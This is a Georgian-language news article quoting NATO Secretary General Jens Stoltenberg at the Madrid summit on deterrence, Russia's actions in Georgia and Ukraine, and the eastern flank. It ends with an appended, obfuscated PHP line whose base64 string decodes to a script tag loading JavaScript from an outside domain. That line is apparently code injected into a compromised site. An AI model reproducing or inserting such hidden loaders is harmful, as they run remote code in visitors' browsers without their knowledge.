celsiusi
ავერსი შნაიდერი
ნატო-ს მთავარი პასუხისმგებლობაა, არ იყოს რაიმე გაუგებრობა რომელიმე მოწინააღმდეგის გონებაში, თუ ისინი გააკეთებენ იმის მსგავსს, რაც რუსეთმა გააკეთა 2008 წელს საქართველოში და ახლა აკეთებენ უკრაინაში, ეს გამოიწვევს მთელი ალიანსის პასუხს, – ამის შესახებ ნატო-ს გენერალურმა მდივანმა იენს სტოლტენბერგმა განაცხადა.
 
მისივე თქმით, ეს არის მთავარი გზავნილი და მიზეზი, რატომ ახდენენ ესკალაციის პრევენციას და ინარჩუნებთ მშვიდობას ალიანსის თითქმის ერთი მილიარდი მცხოვრებისთვის.
 
„ჩვენ ვცხოვრობთ უფრო მეტად სახიფათო და არაპროგნოზირებად მსოფლიოში. ჩვენ ვცხოვრობთ დროში, როდესაც ცხელი ომი მიდის ევროპაში ფართომასშტაბიანი სამხედრო ოპერაციებით, რომლის მსგავსი ევროპაში არ გვინახავს მეორე მსოფლიო ომის შემდეგ. ეს იწვევს უკრაინელი ხალხის ტანჯვას. ჩვენ ასევე ვიცით, რომ სიტუაცია შეიძლება, უფრო გართულდეს, რადგან თუ ეს გადაიზრდება რუსეთის და ნატო-ს სრულმასშტაბიან ომში, ვნახავთ ტანჯვას, ზარალს და სიკვდილს იმაზე დიდი მასშტაბით, რასაც ვხედავთ დღეს უკრაინაში. ამიტომ ნატო-ს აქვს ორი ამოცანა: ერთი არის უკრაინის მხარდაჭერა. ნატო და ნატო-ს მოკავშირეები უკრაინას უპრეცედენტო დახმარებას უწევენ. ასევე, გვაქვს მთავარი პასუხისმგებლობა, რომ მოვახდინოთ ესკალაციის პრევენცია უკრაინის გარეთ. სწორედ ამიტომ, ნატო არ არის კონფლიქტის ნაწილი. სწორედ ამიტომ გავზარდეთ ჩვენი ყოფნა ალიანსის აღმოსავლეთ ფლანგზე, რომ გამოვრიცხოთ ნებისმიერი არასწორი გათვლა და გაუგებრობა მოსკოვში, ჩვენს მზადყოფნაზე, რომ დავიცავთ ალიანსის ყველა სანტიმეტრს. ნატო-ს მთავარი პასუხისმგებლობაა იმის უზრუნველყოფა, არ იყოს რაიმე სახის გაუგებრობა რომელიმე მოწინააღმდეგის გონებაში, რომ თუ ისინი გააკეთებენ იმის მსგავს რამეს, რაც რუსეთმა გააკეთა 2008 წელს საქართველოში და ახლა აკეთებენ უკრაინაში, ეს გამოიწვევს მთელი ალიანსის პასუხს. ეს არის მთავარი გზავნილი და ეს არის მიზეზი, რატომ ვახდენთ თავდასხმის პრევენციას და ვინარჩუნებთ მშვიდობას ნატო-ს ალიანსის თითქმის ერთი მილიარდი მცხოვრებისთვის“, – განაცხადა იენს სტოლტენბერგმა მადრიდის სამიტის დასკვნით პრესკონფერენციაზე.
698
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");